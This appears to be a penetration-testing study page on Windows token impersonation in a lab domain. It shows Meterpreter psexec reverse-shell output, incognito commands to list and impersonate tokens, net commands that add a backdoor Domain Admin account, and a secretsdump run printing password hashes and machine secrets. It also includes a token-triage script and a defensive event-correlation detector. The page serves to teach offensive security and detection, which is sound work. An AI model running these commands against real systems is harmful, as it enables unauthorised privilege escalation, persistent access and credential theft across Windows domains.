# Token Impersonation

### **What are tokens?**

* Temporary keys that allow you access to a system/network without having to provide credentials each time you access a file. Think cookies for computers.

**Two types:**

* **Delegation** – created by interactive logons (console logon, Remote Desktop). A delegation token can be used to authenticate to other systems over the network, which makes it the more valuable find.
* **Impersonation** – created by “non-interactive” logons such as mapping a network drive or running a domain logon script. An impersonation token can only be used on the local machine.

#### Example

<figure><img src="https://755681241-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fa5rXMZ1JAQhUeS7TtZkM%2Fuploads%2FDPjhv88uEW2ecnPgi96Z%2Fimage.png?alt=media&#x26;token=652c3db5-a6d9-42be-8eb8-69a8969d880b" alt=""><figcaption></figcaption></figure>

<figure><img src="https://755681241-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fa5rXMZ1JAQhUeS7TtZkM%2Fuploads%2FSAjmwSzZJ2tMY0I0kSFM%2Fimage.png?alt=media&#x26;token=4f552e33-9604-4c68-8e9e-4e3f673bc382" alt=""><figcaption></figcaption></figure>

We can sometimes also find admin tokens.

<figure><img src="https://755681241-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fa5rXMZ1JAQhUeS7TtZkM%2Fuploads%2FVAwFoiKYS0rLT5haVGx4%2Fimage.png?alt=media&#x26;token=aa72a6a5-9569-4b79-ac77-f028eb6277f2" alt=""><figcaption></figcaption></figure>

<figure><img src="https://755681241-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fa5rXMZ1JAQhUeS7TtZkM%2Fuploads%2FKw02OhbEY4Uk3fQcaNt7%2Fimage.png?alt=media&#x26;token=69f1c4ca-c623-4658-b2c4-72e17c66e3eb" alt=""><figcaption></figcaption></figure>

We can then use it to dump hashes.

<figure><img src="https://755681241-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fa5rXMZ1JAQhUeS7TtZkM%2Fuploads%2FMSELUG9idXc0j2XmNdjj%2Fimage.png?alt=media&#x26;token=59433f7e-e5ad-406b-90c5-26ac111b8244" alt=""><figcaption></figcaption></figure>

We can also add a new user to get more access.

<figure><img src="https://755681241-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fa5rXMZ1JAQhUeS7TtZkM%2Fuploads%2FeItxyNDYnjJnZZAZJlYE%2Fimage.png?alt=media&#x26;token=f457613e-b693-444e-9588-adbe6b6ff122" alt=""><figcaption></figcaption></figure>

### Exploiting Tokens

#### 1. Get a meterpreter shell

We can use the `exploit/windows/smb/psexec` module to get a Meterpreter session if we already have credentials. The account needs local admin rights on the target, because psexec creates and starts a service there.

<figure><img src="https://755681241-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fa5rXMZ1JAQhUeS7TtZkM%2Fuploads%2FWUo762bTV4KK4sPMbfnx%2Fimage.png?alt=media&#x26;token=514905e9-4b17-483c-93ac-7b0a85b4d0f2" alt=""><figcaption></figcaption></figure>

<figure><img src="https://755681241-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fa5rXMZ1JAQhUeS7TtZkM%2Fuploads%2FuxvZhT15twDeo6BzohN4%2Fimage.png?alt=media&#x26;token=76387cb9-2f69-4967-a467-8acc360fceaf" alt=""><figcaption></figcaption></figure>

```
msf6 exploit(windows/smb/psexec) > run

[*] Started reverse TCP handler on 192.168.145.141:4444 
[*] 192.168.145.139:445 - Connecting to the server...
[*] 192.168.145.139:445 - Authenticating to 192.168.145.139:445|MARVEL.local as user 'fcastle'...
[*] 192.168.145.139:445 - Selecting PowerShell target
[*] 192.168.145.139:445 - Executing the payload...
[+] 192.168.145.139:445 - Service start timed out, OK if running a command or non-service executable...
[*] Sending stage (201798 bytes) to 192.168.145.139
[*] Meterpreter session 1 opened (192.168.145.141:4444 -> 192.168.145.139:64070) at 2025-05-21 05:13:13 -0400

meterpreter > 

```

**The user whose token we want must have logged on to the target machine.** A delegation token only exists on the host while that user's logon session (or a process still holding the token) is around; a user who has never logged on there leaves nothing to impersonate.

#### 2. Load the incognito module

Meterpreter's incognito extension provides the commands for listing and impersonating tokens.

You need to load the incognito module first.

```
load incognito
```

You can type help and see the supported commands.

<figure><img src="https://755681241-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fa5rXMZ1JAQhUeS7TtZkM%2Fuploads%2FjcvQkb6XkiQfy3qHLF5A%2Fimage.png?alt=media&#x26;token=2eb1b02c-4f42-4b8a-a5cb-f3753812dd85" alt=""><figcaption></figcaption></figure>

#### List tokens

```
meterpreter > list_tokens -u

Delegation Tokens Available
========================================
Font Driver Host\UMFD-0
Font Driver Host\UMFD-1
MARVEL\fcastle
NT AUTHORITY\LOCAL SERVICE
NT AUTHORITY\NETWORK SERVICE
NT AUTHORITY\SYSTEM
Window Manager\DWM-1

Impersonation Tokens Available
========================================
No tokens available
```

We can also list tokens by group. `BUILTIN\Administrators` showing up under delegation tokens means an administrative token is present on the host.

```
meterpreter > list_tokens -g

Delegation Tokens Available
========================================
\
\Authentication authority asserted identity
BUILTIN\Administrators
BUILTIN\Users
MARVEL\Domain Users
NT AUTHORITY\Authenticated Users
NT AUTHORITY\INTERACTIVE
NT AUTHORITY\LOCAL SERVICE
NT AUTHORITY\LogonSessionId_0_101431
NT AUTHORITY\LogonSessionId_0_103458
```
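The `list_tokens` output above is easy to eyeball on a single host, but on a dozen hosts you want it triaged automatically. The following is an added example, not code from the original page or from the incognito extension: it parses the two sections printed by `list_tokens -u` and `list_tokens -g`, drops the service and session accounts every Windows host carries, and reports the domain accounts and any administrative token. The sample strings are the outputs shown on this page; the noise lists are an assumption you may need to extend for your environment.

```python
"""Triage Meterpreter incognito `list_tokens` output.

Added example (not code from the original page or from the incognito
extension): parses the sections printed by `list_tokens -u` and
`list_tokens -g` and separates accounts worth impersonating from the
service/session accounts every Windows host has.
"""
import re

# Constructed samples: the `list_tokens -u` and `list_tokens -g` output shown on this page.
SAMPLE_USER_TOKENS = """\
Delegation Tokens Available
========================================
Font Driver Host\\UMFD-0
Font Driver Host\\UMFD-1
MARVEL\\fcastle
NT AUTHORITY\\LOCAL SERVICE
NT AUTHORITY\\NETWORK SERVICE
NT AUTHORITY\\SYSTEM
Window Manager\\DWM-1

Impersonation Tokens Available
========================================
No tokens available
"""

SAMPLE_GROUP_TOKENS = """\
Delegation Tokens Available
========================================
\\
\\Authentication authority asserted identity
BUILTIN\\Administrators
BUILTIN\\Users
MARVEL\\Domain Users
NT AUTHORITY\\Authenticated Users
NT AUTHORITY\\INTERACTIVE
NT AUTHORITY\\LOCAL SERVICE
NT AUTHORITY\\LogonSessionId_0_101431
"""

# Built-in principals that say nothing about who is logged on (assumed list; extend as needed).
NOISE_PREFIXES = ("Font Driver Host\\", "Window Manager\\")
NOISE_EXACT = {"NT AUTHORITY\\LOCAL SERVICE", "NT AUTHORITY\\NETWORK SERVICE"}
BUILTIN_AUTHORITIES = {"NT AUTHORITY", "BUILTIN", "NT SERVICE", "FONT DRIVER HOST", "WINDOW MANAGER"}

SECTION_RE = re.compile(r"^(Delegation|Impersonation) Tokens Available$")


def parse_list_tokens(text):
    """Return {'delegation': [...], 'impersonation': [...]} from list_tokens output."""
    sections = {"delegation": [], "impersonation": []}
    current = None
    for raw in text.splitlines():
        line = raw.rstrip()
        if not line or line.startswith("="):
            continue
        m = SECTION_RE.match(line)
        if m:
            current = m.group(1).lower()
            continue
        if current is None or line == "No tokens available":
            continue
        sections[current].append(line)
    return sections


def interesting_tokens(tokens):
    """Drop per-session service accounts; keep SYSTEM and real user accounts."""
    return [t for t in tokens if not t.startswith(NOISE_PREFIXES) and t not in NOISE_EXACT]


def domain_accounts(tokens):
    """Tokens of the form DOMAIN\\user where DOMAIN is not a built-in authority."""
    out = []
    for t in tokens:
        authority, sep, _name = t.partition("\\")
        if sep and authority and authority.upper() not in BUILTIN_AUTHORITIES:
            out.append(t)
    return out


def has_admin_token(group_output):
    """True if a delegation token carrying BUILTIN\\Administrators exists (list_tokens -g)."""
    return "BUILTIN\\Administrators" in parse_list_tokens(group_output)["delegation"]


def triage(user_output):
    """Summarise list_tokens -u output: what is worth impersonating, and which are domain accounts."""
    parsed = parse_list_tokens(user_output)
    delegation = interesting_tokens(parsed["delegation"])
    return {
        "delegation": delegation,
        "impersonation": interesting_tokens(parsed["impersonation"]),
        "domain_delegation": domain_accounts(delegation),
    }


if __name__ == "__main__":
    print(triage(SAMPLE_USER_TOKENS))
    print("admin token present:", has_admin_token(SAMPLE_GROUP_TOKENS))
```

Delegation tokens are reported separately from impersonation tokens on purpose: only the former can be used to reach other hosts, so a domain account in the delegation list is the one to go after first.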

#### Impersonate tokens

```
meterpreter > impersonate_token marvel\\fcastle
[+] Delegation token available
[+] Successfully impersonated user MARVEL\fcastle
meterpreter > shell
Process 7828 created.
Channel 1 created.
Microsoft Windows [Version 10.0.19045.2006]
(c) Microsoft Corporation. All rights reserved.

C:\Windows\system32>whoami
whoami
marvel\fcastle

C:\Windows\system32>
```

If an administrator's delegation token is present (for example because a domain admin is logged on to the host), you can impersonate it in exactly the same way.

<figure><img src="https://755681241-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fa5rXMZ1JAQhUeS7TtZkM%2Fuploads%2FqgKCDmnEFKm11kLfsOtb%2Fimage.png?alt=media&#x26;token=a254ad0f-2e31-4890-a0b3-dcaf50a000d7" alt=""><figcaption></figcaption></figure>

#### Adding a user

With an administrator token we can create a domain user and add it to Domain Admins. Check first with `whoami /groups` that the impersonated token actually carries Domain Admins, otherwise the `/domain` commands will fail with access denied. Both commands are logged on the domain controller and leave a persistent account behind, so note it down for cleanup.

```
C:\Windows\system32>net user /add hawkeye Password1@ /domain
net user /add hawkeye Password1@ /domain
The request will be processed at a domain controller for domain MARVEL.local.

The command completed successfully.


C:\Windows\system32>net group "Domain Admins" hawkeye /ADD /DOMAIN
net group "Domain Admins" hawkeye /ADD /DOMAIN
The request will be processed at a domain controller for domain MARVEL.local.

The command completed successfully.


C:\Windows\system32>
```
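The two `net` commands above are what a defender is most likely to catch: account creation and a Domain Admins change each raise a Security event on the DC. The following is an added example, not code from the original page: it correlates event 4720 (user account created) with event 4728 (member added to a security-enabled global group) for the same account and flags the pair when they are seconds apart, as they are in the `hawkeye` case. The event records are constructed to mirror what those commands produce; the field names follow the Security log's EventData, but the timestamps and the `svc_backup` account are made up.

```python
"""Flag 'account created, then immediately added to Domain Admins' in Security events.

Added example, not from the original page: correlates event 4720 (user
account created) with 4728 (member added to a security-enabled global group)
for the same account. The records below are constructed to mirror what the
page's `net user /add` and `net group "Domain Admins" /ADD` produce on the DC;
timestamps and the svc_backup account are made up.
"""
from datetime import datetime, timedelta

DOMAIN_ADMINS = "Domain Admins"

# Constructed sample events (field names as in the Security log's EventData).
EVENTS = [
    {"EventID": 4624, "time": "2025-05-21T09:20:00", "TargetUserName": "fcastle",
     "SubjectUserName": "-"},
    {"EventID": 4720, "time": "2025-05-21T09:26:10", "TargetUserName": "hawkeye",
     "SubjectUserName": "Administrator"},
    {"EventID": 4728, "time": "2025-05-21T09:26:20",
     "MemberName": "CN=hawkeye,CN=Users,DC=MARVEL,DC=local",
     "TargetUserName": "Domain Admins", "SubjectUserName": "Administrator"},
    # A change made hours after the account was created: outside a short window.
    {"EventID": 4720, "time": "2025-05-20T08:00:00", "TargetUserName": "svc_backup",
     "SubjectUserName": "Administrator"},
    {"EventID": 4728, "time": "2025-05-20T09:30:00",
     "MemberName": "CN=svc_backup,CN=Users,DC=MARVEL,DC=local",
     "TargetUserName": "Domain Admins", "SubjectUserName": "Administrator"},
]


def member_cn(member_name):
    """Account name from a 4728 MemberName DN such as CN=hawkeye,CN=Users,DC=..."""
    first = member_name.split(",", 1)[0]
    return first[3:] if first.upper().startswith("CN=") else first


def find_rapid_privilege_grants(events, window_minutes=10, group=DOMAIN_ADMINS):
    """One hit per account that was created and then added to `group` within the window."""
    created = {}   # account name (lower-case) -> (creation time, creator)
    hits = []
    for ev in sorted(events, key=lambda e: e["time"]):
        ts = datetime.fromisoformat(ev["time"])
        if ev["EventID"] == 4720:
            created[ev["TargetUserName"].lower()] = (ts, ev["SubjectUserName"])
        elif ev["EventID"] == 4728 and ev["TargetUserName"].lower() == group.lower():
            acct = member_cn(ev["MemberName"]).lower()
            if acct not in created:
                continue
            created_at, creator = created[acct]
            delta = ts - created_at
            if timedelta(0) <= delta <= timedelta(minutes=window_minutes):
                hits.append({"account": acct, "created_by": creator,
                             "added_by": ev["SubjectUserName"],
                             "seconds_between": int(delta.total_seconds())})
    return hits


if __name__ == "__main__":
    for hit in find_rapid_privilege_grants(EVENTS):
        print(f"{hit['account']}: created by {hit['created_by']}, added to Domain Admins "
              f"by {hit['added_by']} after {hit['seconds_between']}s")
```

The window is the tunable part: ten minutes catches a scripted "create and promote" sequence like the one on this page while letting a ticketed change made later in the day through, and widening it trades precision for recall.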

#### Secrets Dump

With the new Domain Admin account we can run `impacket-secretsdump` against the host over the network. Against a workstation like this one it returns the local SAM hashes, the cached domain logon hashes (DCC2) and the LSA secrets, including the machine account's password and Kerberos keys; to get the domain's NTDS.dit you would point it at a domain controller instead. Note that secretsdump enables the RemoteRegistry service for the duration of the dump and restores its state afterwards, which shows up in the System event log. In the output below, Administrator and frankcastle share the same NT hash, so they share a password, and the `31d6cfe0...` value on Guest and DefaultAccount is the NT hash of an empty password.

```
┌──(kali㉿kali)-[~]
└─$ impacket-secretsdump 'MARVEL.local/hawkeye:Password1@@192.168.145.139'

Impacket v0.12.0.dev1 - Copyright 2023 Fortra

[*] Service RemoteRegistry is in stopped state
[*] Service RemoteRegistry is disabled, enabling it
[*] Starting service RemoteRegistry
[*] Target system bootKey: 0xec9be313e502a2aa71fd4e8e4c9999d5
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:64f12cddaa88057e06a81b54e73b949b:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:6578f05068adb3e4a16d3253bd46bacb:::
frankcastle:1001:aad3b435b51404eeaad3b435b51404ee:64f12cddaa88057e06a81b54e73b949b:::
[*] Dumping cached domain logon information (domain/username:hash)
MARVEL.LOCAL/fcastle:$DCC2$10240#fcastle#e6f48c2526bd594441d3da3723155f6f: (2025-05-21 09:14:56)
MARVEL.LOCAL/Administrator:$DCC2$10240#Administrator#c7154f935b7d1ace4c1d72bd4fb7889c: (2025-05-21 09:26:34)
[*] Dumping LSA Secrets
[*] $MACHINE.ACC 
MARVEL\THEPUNISHER$:aes256-cts-hmac-sha1-96:6a98901004c69df5467cd869f4ea7c1f0e5f3d8848a9549a5aa9b7ba3b3150e4
MARVEL\THEPUNISHER$:aes128-cts-hmac-sha1-96:ec537eb458177012db5ab7997afd825b
MARVEL\THEPUNISHER$:des-cbc-md5:cd4af415fb927af4
MARVEL\THEPUNISHER$:plain_password_hex:660056004b006300470078004000550048004f00570027007200250059002c002600720020006c00500024005e003a005900580058004e005d006700750041002c002d00590030004400640043002f0037007000480065004400660044005600670067005f00290068007a00570037006a002a003200330075003e00750066004400320064007100700035003600710059003d004f00580055005d0065003d0051002f0059006e00690029002f00590020002d006100270069002c003700550047003500570030005d0056002e00780074004e007a003900450071003f0072006e0045004200300058002c0028006f00
MARVEL\THEPUNISHER$:aad3b435b51404eeaad3b435b51404ee:b5458f32b6a10e8482ae7a582f776ab0:::
[*] DPAPI_SYSTEM 
dpapi_machinekey:0x6174875d29cb646655e1dd49c2853691667f78f2
dpapi_userkey:0xa4d2daa834d71945360ce5b8ac5efcf2a02a9c28
[*] NL$KM 
 0000   09 9F C6 F6 60 EF 09 3E  30 CC 5B AA C7 AC 5A FB   ....`..>0.[...Z.
 0010   CA 61 47 50 2D 62 B1 36  D6 59 69 2F 82 CB 81 DE   .aGP-b.6.Yi/....
 0020   D8 20 BF 99 BA 90 0C 47  10 9E 8E CB F5 01 E2 F0   . .....G........
 0030   0C 9C FC 1A BF AD 66 7B  03 11 DA A4 DF CD 60 63   ......f{......`c
NL$KM:099fc6f660ef093e30cc5baac7ac5afbca6147502d62b136d659692f82cb81ded820bf99ba900c47109e8ecbf501e2f00c9cfc1abfad667b0311daa4dfcd6063
[*] Cleaning up... 
[*] Stopping service RemoteRegistry
[*] Restoring the disabled state for service RemoteRegistry

```
